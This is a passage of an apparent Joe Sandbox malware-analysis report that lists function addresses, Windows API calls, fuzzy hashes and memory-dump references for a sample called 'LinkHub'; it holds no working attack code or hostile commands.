Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1cce9825c820736c4a81f8fda60858f1b8e08989b669e17079817d8947f91287
Instruction ID: 8851338c712391d2d482e0f7e3d8c2f2f26a4fd44618b3c3b7daad424c1cc8f4
Opcode Fuzzy Hash: 1cce9825c820736c4a81f8fda60858f1b8e08989b669e17079817d8947f91287
Instruction Fuzzy Hash: C011383A200342ABCB14AF38D845E7A77E9FF48B50B10426AF946C7260EF359811C794

Function 00B960FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00B9615A
_wcslen.LIBCMT ref: 00B9616C
_wcslen.LIBCMT ref: 00B96177
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B962B5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 44ec78bfa3c7003627322e7113ebf09b89c9cdccee74a36a6db9791aca37f320
Instruction ID: f1a317abcf61162dceb81a2a55ca82c5de145d2cb2c3ee5c2bdb0b2dc31d44cd
Opcode Fuzzy Hash: 44ec78bfa3c7003627322e7113ebf09b89c9cdccee74a36a6db9791aca37f320
Instruction Fuzzy Hash: 9111B135540228A6DF21DFA59CC4AEE7BECEF113A4F1040BBF915E6081EB70C944DB60

Function 00B32079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c64ca60ff079d952f34f84171e4be108f3519a63eaa5962a9e1edd0ee4ded078
Instruction ID: 1f41868a62d558533d913c4164ec996b7acb13b25684057aa751033312027995
Opcode Fuzzy Hash: c64ca60ff079d952f34f84171e4be108f3519a63eaa5962a9e1edd0ee4ded078
Instruction Fuzzy Hash: 2101ADB22096167EF625277CBCC1F27778DDF413B8F3507A6B521A21D1EF608C448160

Function 00B62374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B62394
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B623A6
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B623BC
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B623D7

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: caee185db5f11a6f101c64b76d1a8cc4de59e3bd1a802f37b1ae13f7d5c28b30
Instruction ID: d54dafa7ff680ec8da33ba2f37d42beb8ec5bf2c53a019ccaad42b24ebae863d
Opcode Fuzzy Hash: caee185db5f11a6f101c64b76d1a8cc4de59e3bd1a802f37b1ae13f7d5c28b30
Instruction Fuzzy Hash: 5211093A900219FFEB119BA5CD85F9DBBB8FB08750F200092EA01B7290D7756E10DB94

Function 00B01AAC Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B0249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B024B0

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B01AF4
GetClientRect.USER32(?,?), ref: 00B431F9
GetCursorPos.USER32(?), ref: 00B43203
ScreenToClient.USER32(?,?), ref: 00B4320E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: bedf995b61ff1e964fdd05beaa71d6823d7511e530be20f938b57ab96b6f42f4
Instruction ID: 69f690983d002d5877a7147e8b0b331700cc898192e4941acf80dcff48c1dc2a
Opcode Fuzzy Hash: bedf995b61ff1e964fdd05beaa71d6823d7511e530be20f938b57ab96b6f42f4
Instruction Fuzzy Hash: 4B110D31A01519ABDF14DF98C9869EEBBF8EB05344F100496F512E3150DB71BA51DBA1

Function 00B6EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B6EB14
MessageBoxW.USER32(?,?,?,?), ref: 00B6EB47
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B6EB5D
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B6EB64

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d0d666f47cad006663bd3512718c91d02f0780be0216aa96970d35bfda22a3d4
Instruction ID: a727486e17c2508a579fa88757174085a7751fd1dcd2a61d05d5d8698f51e0f1
Opcode Fuzzy Hash: d0d666f47cad006663bd3512718c91d02f0780be0216aa96970d35bfda22a3d4
Instruction Fuzzy Hash: 5011F976904268BFDB019FA89C46A9F7FEDEB45320F144297F835E3290DA79CD0487A0

Function 00B2D53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00B2D369,00000000,00000004,00000000), ref: 00B2D588
GetLastError.KERNEL32 ref: 00B2D594
__dosmaperr.LIBCMT ref: 00B2D59B
ResumeThread.KERNEL32(00000000), ref: 00B2D5B9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 9b2f6a33657637e8e7f8a0269635951c85e0646995eaa6a7ae23fb17bc3d9090
Instruction ID: 02cf364f46e6727dc5670956822f997a75253bb7bd78be505aa971d401e66d41
Opcode Fuzzy Hash: 9b2f6a33657637e8e7f8a0269635951c85e0646995eaa6a7ae23fb17bc3d9090
Instruction Fuzzy Hash: B401D6324041347BCB116FA5FC05BAE7BA8EF41335F100296F92D871E0DFB08800C6A1

Function 00B07873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B078B1
GetStockObject.GDI32(00000011), ref: 00B078C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B078CF

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 7ad19413b2969642851fb038ef3cc69001de40092cfa08be1ed5809b3bdb5549
Instruction ID: 80fdc675189f5905fd0e3381f62766c51aa0a0605e08d98d0734d27e450abf04
Opcode Fuzzy Hash: 7ad19413b2969642851fb038ef3cc69001de40092cfa08be1ed5809b3bdb5549
Instruction Fuzzy Hash: 8511C072905648BFDF025F91CC58EEABFA9FF083A4F044156FA0152160DB35EC60EBA0

Function 00B333E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B711D9,00000000,00000000,?,00B3338D,00B711D9,00000000,00000000,00000000,?,00B335FE,00000006,FlsSetValue), ref: 00B33418
GetLastError.KERNEL32(?,00B3338D,00B711D9,00000000,00000000,00000000,?,00B335FE,00000006,FlsSetValue,00BA3260,FlsSetValue,00000000,00000364,?,00B331B9), ref: 00B33424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B3338D,00B711D9,00000000,00000000,00000000,?,00B335FE,00000006,FlsSetValue,00BA3260,FlsSetValue,00000000), ref: 00B33432

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1cebc22cb98bc22a922b7927eb5ff06a6f001af36e67489db166624c129d3581
Instruction ID: f88637043217b8029e98211bbfdb137219faf345a6603ddc14055298fdcbc4ce
Opcode Fuzzy Hash: 1cebc22cb98bc22a922b7927eb5ff06a6f001af36e67489db166624c129d3581
Instruction Fuzzy Hash: 1501D432611222ABCB224B799D44A577BD8EF05F71B300661F906D3390DB20DA01C6E0

Function 00B6BA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B6B69A,?,00008000), ref: 00B6BA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B6B69A,?,00008000), ref: 00B6BAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B6B69A,?,00008000), ref: 00B6BABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B6B69A,?,00008000), ref: 00B6BAED

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 365f0f6339c2f7f468e05cb9473ad30dd3e8b8be2b94d0afd8c49cf5d7fab938
Instruction ID: c5cc58344a5b7e19cd76a1203cd81acb00c7c79903e49831dac5888349957aeb
Opcode Fuzzy Hash: 365f0f6339c2f7f468e05cb9473ad30dd3e8b8be2b94d0afd8c49cf5d7fab938
Instruction Fuzzy Hash: D5112731C00A29EBCF009FE5E949AEEBBB8BF09711F104196D941B2150CF389690CBA5

Function 00B9886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B9888E
ScreenToClient.USER32(?,?), ref: 00B988A6
ScreenToClient.USER32(?,?), ref: 00B988CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B988E5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 05ec9e7fef3fdcfec52013d74307387d1ff970c6702e4efa5ce6ecbf72093898
Instruction ID: 6c4981e9f4f6fb6555372f089154a768f18a4740ca1b26ffd860a3c43b38d38f
Opcode Fuzzy Hash: 05ec9e7fef3fdcfec52013d74307387d1ff970c6702e4efa5ce6ecbf72093898
Instruction Fuzzy Hash: 5D1142B9D00209EFDB41DFA9C984AEEBBF9FB08310F508166E915E3210DB35AA54CF50

Function 00B636F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B63712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B63723
GetCurrentThreadId.KERNEL32 ref: 00B6372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B63731

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b0b78dd8f9ddf2f0a792980c5135b4b5b93253dbc5f0e3147d540312cfb01f54
Instruction ID: 64965aeaa4b4fb2194b567c51bf48d43412ba6b26470bbb667d354df64d702c8
Opcode Fuzzy Hash: b0b78dd8f9ddf2f0a792980c5135b4b5b93253dbc5f0e3147d540312cfb01f54
Instruction Fuzzy Hash: 5DE0EDB2601224BADA2057A39D8DEFB7FACEB56BA1F500056F505D2090DEA98940D6B1

Function 00B992BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B01F87
Part of subcall function 00B01F2D: SelectObject.GDI32(?,00000000), ref: 00B01F96
Part of subcall function 00B01F2D: BeginPath.GDI32(?), ref: 00B01FAD
Part of subcall function 00B01F2D: SelectObject.GDI32(?,00000000), ref: 00B01FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B992E3
LineTo.GDI32(?,?,?), ref: 00B992F0
EndPath.GDI32(?), ref: 00B99300
StrokePath.GDI32(?), ref: 00B9930E

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4c970302a5dad71bf0a50a00d227be7f628ae7fa19c5e9c5271c14a4955f788b
Instruction ID: 698a3ad1025bdded9e208e4649e16cbffc719478e4b4bec696917c2a550e7798
Opcode Fuzzy Hash: 4c970302a5dad71bf0a50a00d227be7f628ae7fa19c5e9c5271c14a4955f788b
Instruction Fuzzy Hash: 68F08232006259BBDB125F55AD1EFCE3F99AF0A320F048046FA15230E1CB795522DFE9

Function 00B021A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B021BC
SetTextColor.GDI32(?,?), ref: 00B021C6
SetBkMode.GDI32(?,00000001), ref: 00B021D9
GetStockObject.GDI32(00000005), ref: 00B021E1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 93c322fb7358a9dc871a868ecc864151bdb93d8122045a2a61f71c2445e1a914
Instruction ID: 59d1f740167e99b689b684731ea1ae6b58a4003fcdff842fc3ed89777aee45ce
Opcode Fuzzy Hash: 93c322fb7358a9dc871a868ecc864151bdb93d8122045a2a61f71c2445e1a914
Instruction Fuzzy Hash: D4E06532244240AADB215F75BD097E87B91EB11735F04C25AF7B5650E0CB7186409B10

Function 00B5EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B5EC36
GetDC.USER32(00000000), ref: 00B5EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B5EC60
ReleaseDC.USER32(?), ref: 00B5EC81

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f86e75f2698bd683e5579f68bc31718b62dbfb76916ec10c04756501845a50bc
Instruction ID: aa329927a92ea1a1efd0e01f4666b954f45a97c38af17c704eed6a115afb46c6
Opcode Fuzzy Hash: f86e75f2698bd683e5579f68bc31718b62dbfb76916ec10c04756501845a50bc
Instruction Fuzzy Hash: 8AE01A71800204DFCB409FA1DA48A5DBBF1EB08311F10848AE81AE3250CB3899419F10

Function 00B5EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B5EC4A
GetDC.USER32(00000000), ref: 00B5EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B5EC60
ReleaseDC.USER32(?), ref: 00B5EC81

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: f114b12dcb1483286c041efcdb95f32efcaae5cd2ce6c513877ddc6f2d9e0498
Instruction ID: 730f30708a5ee177459f05beb9083f4e450d9ef13ba6eb22dfdfbc1bfb7f0191
Opcode Fuzzy Hash: f114b12dcb1483286c041efcdb95f32efcaae5cd2ce6c513877ddc6f2d9e0498
Instruction Fuzzy Hash: 5DE012B1C00204EFCB409FA1DA48A5DBBF1AB08310B10848AE81AE3290CB38A9019F10

Function 00B757CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B041EA: _wcslen.LIBCMT ref: 00B041EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B75919

Strings

LPT, xrefs: 00B75840
*, xrefs: 00B75855

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: ff3f188ed608a1a0dd0b246163f3e1f50d82d6ac49f31996ee976670daa217e7
Instruction ID: d5fc68a3b9909e8873773d118efee2e2ed33b44364b46a27ca34b6b976a7060d
Opcode Fuzzy Hash: ff3f188ed608a1a0dd0b246163f3e1f50d82d6ac49f31996ee976670daa217e7
Instruction Fuzzy Hash: B6914B75A00604DFDB24DF54C494AA9BBF1EF44314F18C0D9E85A9B3A2C771EE85CB91

Function 00B2E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B2E67D

Strings

pow, xrefs: 00B2E655, 00B2E672

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f97d65e8e95330d6759c374f6e5e197c4877f3416b39377246406683ded51cec
Instruction ID: c5ef657c37382468d68e321523a6a6fe0e49298763c2de889f3777d98c7dcfc4
Opcode Fuzzy Hash: f97d65e8e95330d6759c374f6e5e197c4877f3416b39377246406683ded51cec
Instruction Fuzzy Hash: 2C518E61E0970296CB167719ED423AA7BE0EB54B00F304DD9F0A9522F8EF35CC859A47

Function 00B1A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00B1A916

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
